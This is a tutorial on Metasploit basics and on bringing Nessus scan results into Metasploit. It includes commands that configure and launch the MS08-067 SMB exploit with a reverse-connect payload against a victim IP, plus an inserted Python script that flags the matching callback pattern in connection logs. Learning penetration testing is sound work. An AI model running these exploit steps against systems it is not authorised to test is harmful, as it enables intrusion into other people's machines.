Metasploit Tutorial From Basic To Advanced

Metasploit is the best penetration testing and ethical hacking tool, and it automates the whole penetration testing process. Different tutorials are available on the Internet, but here we discuss Metasploit from basic to advanced.

Metasploit Basic Command Tutorial

Many new Metasploit users (beginners) have asked us to write a basic introductory article about the basic Metasploit commands and basic usage of Metasploit. We have already shared different advanced and mid-level Metasploit tutorials on BackTrack 5, and you can learn different commands from those tutorials, but here is a list of the best and most common commands used in Metasploit for different purposes. Later on we will share meterpreter commands as well.

Metasploit is a database of exploits and a piece of software that contains information about different exploits, so here is the basic usage of Metasploit. I am using a BackTrack 5 machine for this tutorial; if you are using another Linux distribution or Windows, that is fine, as the only requirement is Metasploit.

Msfconsole

Msfconsole is the console (command window) of Metasploit. It gives you full support for Metasploit's internal and external commands. There was a web interface for Metasploit, but we no longer have that option.

To start the Metasploit console, type msfconsole in your terminal.

root@bt:~# msfconsole

Metasploit is also available with a GUI (graphical user interface). If you want to run the Metasploit GUI, type the following in the terminal.

root@bt:~# msfgui

The help command gives you a basic idea of how to use Metasploit. If you are looking for msfconsole help, type the following from the root terminal:

root@bt:~# msfconsole -h

For help on msfconsole usage, you need to be inside the msfconsole window:

msf > help

The connect command is Metasploit's alternative to telnet and ncat. Use it to connect to a remote or local host from within Metasploit; you can specify the IP of the host machine.

msf > connect -s www.metasploit.com 443

[*] Connected to www.metasploit.com:443

GET / HTTP/1.0

-s → SSL

The ping command in msfconsole checks whether a host is alive, and so on.

msf > ping 192.168.1.45

Show exploits lists all the exploits available in Metasploit.

msf > show exploits

Show payloads, just like show exploits, lists all the payloads available in Metasploit.

msf > show payloads

The info command gives you more information about any exploit or payload.

msf > info <exploit>

msf > info <payload>

The use command tells Metasploit to use an exploit or payload.

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > show options → To show available options

msf exploit(ms08_067_netapi) > set rhost 119.67.45.2 → To set remote IP (victim IP)

msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 → To set local IP (attacker IP)

msf exploit(ms08_067_netapi) > set rport 445 → To set port number of remote host

msf exploit(ms08_067_netapi) > set lport 443 → To set port number of local host

msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → To set payload

msf exploit(ms08_067_netapi) > unset rhost → To remove rhost

msf exploit(ms08_067_netapi) > unset lhost → To remove local host

msf exploit(ms08_067_netapi) > exploit → To execute exploit

msf exploit(ms08_067_netapi) > back → To go back to the main window

msf exploit(ms08_067_netapi) > sessions -l → To check any active session

msf exploit(ms08_067_netapi) > sessions -i ID → To interact with an active session; ID must be a number
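
The settings above (rport 445 on the target and a reverse payload calling back to lhost on lport 443) leave a recognizable pattern in connection logs: a host receives SMB traffic and shortly afterwards opens a connection back to the same peer. The following is an added example, not part of the original tutorial, that flags that pattern; the log format, the sample lines and the function names are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample connection log: timestamp, source IP, destination IP, destination port.
SAMPLE_LOG = """\
2024-01-10T09:00:01 192.168.1.45 192.168.1.60 445
2024-01-10T09:00:04 192.168.1.60 192.168.1.45 443
2024-01-10T09:05:00 192.168.1.70 192.168.1.60 445
2024-01-10T09:30:00 192.168.1.60 203.0.113.10 443
2024-01-10T10:00:00 192.168.1.45 192.168.1.61 445
2024-01-10T10:20:00 192.168.1.61 192.168.1.45 443
"""

def parse(log_text):
    """Yield (time, src, dst, dport) tuples, skipping malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue
        yield ts, parts[1], parts[2], int(parts[3])

def find_callbacks(log_text, smb_port=445, callback_ports=(443,), window_s=60):
    """Return alerts where a host receives SMB from a peer and then connects
    back to that same peer on a callback port within window_s seconds."""
    window = timedelta(seconds=window_s)
    last_smb = {}  # (smb_client, smb_server) -> time of most recent inbound SMB
    alerts = []
    for ts, src, dst, dport in sorted(parse(log_text)):
        if dport == smb_port:
            last_smb[(src, dst)] = ts
        elif dport in callback_ports:
            seen = last_smb.get((dst, src))  # did dst send SMB to src earlier?
            if seen is not None and ts - seen <= window:
                alerts.append({"target": src, "peer": dst, "port": dport,
                               "delay_s": (ts - seen).total_seconds()})
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print(alert)
```

The callback port list and time window are tunable; a reverse payload can use any lport, so in practice the port filter is widened or dropped and the correlation on the peer address carries the detection.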

Integrate Nessus With Metasploit

There are many tools, but the importance of Nessus as a vulnerability scanner is well known, and Metasploit, the master of all tools because it contains the available exploits, is just as important for penetration testing and for hacking.

This time we have decided to write about using Metasploit on the basis of Nessus results. You can use a Linux box (recommended) or a Windows box. BackTrack 5 is available, so practicing on a BackTrack machine is fine, while I am using Ubuntu for this tutorial.

So start metasploit,

$ msfconsole

In this process we set up the Nessus Bridge for Metasploit, so in Metasploit type:

msf > load nessus

After the plugin has loaded successfully, you need to import the Nessus results into Metasploit, so first of all we have to connect our Nessus server to Metasploit. Here is the command:

msf > nessus_connect username:password@hostname:port

msf > nessus_connect ehacking:irfan@127.0.0.1:8834

After successful authentication you can check the status of your Nessus scan, check the policy, pause and resume the scan, and view, add and delete users. In general, you can do anything that you can do from the Nessus window.

If you want to check the server status, type:

msf > nessus_server_status

Now we come to the main objective of the article. The command below lists all the reports:

msf > nessus_report_list

If you want to know about the hosts in a report:

msf > nessus_report_hosts <report id>

msf > nessus_report_hosts a6656thy45ehacking

If you need information about a particular host, use the command below.

msf > nessus_report_host_ports <hostname> <report id>

msf > nessus_report_host_ports 192.168.1.1 a6656thy45ehacking
